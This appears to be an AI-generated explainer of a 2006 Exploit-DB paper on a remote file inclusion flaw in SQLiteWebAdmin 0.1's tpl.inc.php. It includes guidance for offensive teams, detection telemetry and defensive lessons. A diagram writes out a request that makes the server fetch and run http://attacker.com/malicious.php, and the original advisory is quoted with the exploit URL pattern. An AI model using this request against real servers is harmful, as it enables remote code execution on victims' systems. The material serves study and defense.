Understanding the SQLiteWebAdmin 0.1 'tpl.inc.php' RFI Exploit

What this paper is

This paper details a Remote File Inclusion (RFI) vulnerability in SQLiteWebAdmin version 0.1. RFI allows an attacker to trick a web application into including and executing arbitrary code from a remote server. In this specific case, the vulnerability lies within the tpl.inc.php file and is triggered by manipulating the conf[classpath] parameter.

Simple technical breakdown

The core of the vulnerability is how the tpl.inc.php script handles user-supplied input for the conf[classpath] parameter. If the web server is configured with register_globals = On, PHP will automatically convert GET/POST parameters into global variables. The script then likely uses this conf[classpath] variable without proper sanitization to include external files. By providing a URL to a malicious script on a remote server, an attacker can cause the vulnerable web application to download and execute that script.

Complete code and payload walkthrough

The provided exploit paper is very brief and does not contain any actual code or shellcode. It describes the vulnerability and the method of exploitation.

• Vulnerable Component: tpl.inc.php file within the lib directory of SQLiteWebAdmin 0.1.
• Exploitable Parameter: conf[classpath]
• Exploitation Method: Providing a URL to a remote script via the conf[classpath] parameter.
• Prerequisite: register_globals = On must be enabled on the target web server.

Mapping:

• tpl.inc.php: The specific PHP file containing the flaw.
• lib directory: The location of the vulnerable file.
• conf[classpath]: The GET/POST parameter that, when controlled by an attacker, leads to the vulnerability.
• [URL-OF-SCRIPT]: A placeholder for the attacker's malicious script hosted on a remote server.
• register_globals=on: A critical PHP configuration setting that makes the exploit possible by auto-registering external variables.

Since there is no code or payload provided in the original paper, a detailed walkthrough of code blocks or shellcode is not possible. The "payload" in this context is simply the URL of the attacker-controlled script.

Practical details for offensive operations teams

• Required Access Level: Typically, an attacker would need to be able to interact with the web application through its HTTP interface. No elevated privileges on the server itself are initially required, beyond what's needed to send HTTP requests.
• Lab Preconditions:
  • A vulnerable instance of SQLiteWebAdmin 0.1 deployed on a web server.
  • The target web server must have register_globals = On. This is a crucial and often difficult prerequisite to meet on modern systems, as register_globals has been deprecated and removed for security reasons.
  • An attacker-controlled web server capable of hosting the malicious PHP script.
• Tooling Assumptions:
  • A web browser or an HTTP request tool (like curl, Burp Suite, OWASP ZAP) to craft and send the malicious request.
  • A simple HTTP server to host the attacker's payload.
• Execution Pitfalls:
  • register_globals = Off: This is the most significant pitfall. If register_globals is off (which is the default and recommended setting in modern PHP), this exploit will not work as described.
  • Input Sanitization: Even with register_globals = On, the application might have other input validation or sanitization mechanisms that could prevent the inclusion of arbitrary URLs.
  • Firewall/Network Restrictions: The target server might have outbound firewall rules preventing it from connecting to the attacker's hosting server.
  • Web Application Firewall (WAF): A WAF might detect and block the malicious request pattern.
  • Incorrect URL Encoding: The [URL-OF-SCRIPT] needs to be properly URL-encoded if it contains special characters.
  • Payload Execution Environment: The included script will be executed within the context of the web server's PHP interpreter. This means it will have the permissions and environment of the web server process.
• Telemetry:
  • HTTP Access Logs: Look for requests to tpl.inc.php with a conf[classpath] parameter containing an external URL.
  • Web Server Error Logs: If the inclusion fails or the remote script has errors, these might be logged.
  • Network Traffic: Monitor outbound connections from the web server to external IP addresses, especially those hosting the attacker's payload.
  • Process Execution: If the payload executes commands, these would appear as new processes spawned by the web server user.

Where this was used and when

This vulnerability was published in August 2006. At that time, register_globals = On was more common in PHP configurations, making such RFI vulnerabilities prevalent. It's highly unlikely this specific vulnerability would be effective against modern, well-maintained web applications due to the deprecation of register_globals and general improvements in web application security practices.

Defensive lessons for modern teams

• Disable register_globals: This is paramount. Ensure register_globals is set to Off in your PHP configuration (php.ini). This was a major source of vulnerabilities in older PHP versions.
• Input Validation and Sanitization: Never trust user input. Always validate and sanitize all external data before using it in sensitive operations like file inclusion, database queries, or command execution.
• Use Secure File Inclusion Practices: When you need to include files, use explicit paths and avoid user-controlled variables. If dynamic inclusion is necessary, use whitelisting of allowed file names or paths.
• Keep Software Updated: Use the latest stable versions of web applications and their dependencies. SQLiteWebAdmin 0.1 is ancient and unsupported.
• Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block common attack patterns, including RFI attempts.
• Principle of Least Privilege: Run web servers and applications with the minimum necessary privileges to limit the impact of a successful compromise.

ASCII visual (if applicable)

This exploit relies on a direct server-side interaction and doesn't involve complex network architectures that would benefit from a detailed ASCII diagram. The core concept is a single request to a vulnerable server.

+-----------------+      +-----------------------+
| Attacker's Host |----->| Target Web Server     |
| (e.g., Payload) |      | (SQLiteWebAdmin 0.1)  |
+-----------------+      +-----------+-----------+
                                     |
                                     | HTTP Request
                                     | (conf[classpath]=http://attacker.com/malicious.php)
                                     v
                             +-----------------+
                             | tpl.inc.php     |
                             | (Vulnerable)    |
                             +-----------------+
                                     |
                                     | Includes and Executes
                                     | remote script
                                     v
                             +-----------------+
                             | Attacker's Host |
                             | (Script Runs)   |
                             +-----------------+

Source references

• Paper URL: https://www.exploit-db.com/papers/2123
• Original Source: milw0rm.com [2006-08-07]
• Software: SQLiteWebAdmin (http://sourceforge.net/projects/sqlitewebadmin)

Original Exploit-DB Content (Verbatim)

SQLiteWebAdmin
http://sourceforge.net/projects/sqlitewebadmin

SQLiteWebAdmin is a simple PHP program for administrating
a SQL DataBase.

It suffers of a Remote File Inclusion Vulnerability.

The bug is in the "tpl.inc.php" program in the "lib"
directory, and is exploited when passing the parameter
"conf[classpath]".

http://www.server.com/lib/tpl.inc.php?conf[classpath]=[URL-OF-SCRIPT]

Succesfull explotation, needs register_globals=on

Att.
SirDarckCat
elhacker.net

# milw0rm.com [2006-08-07]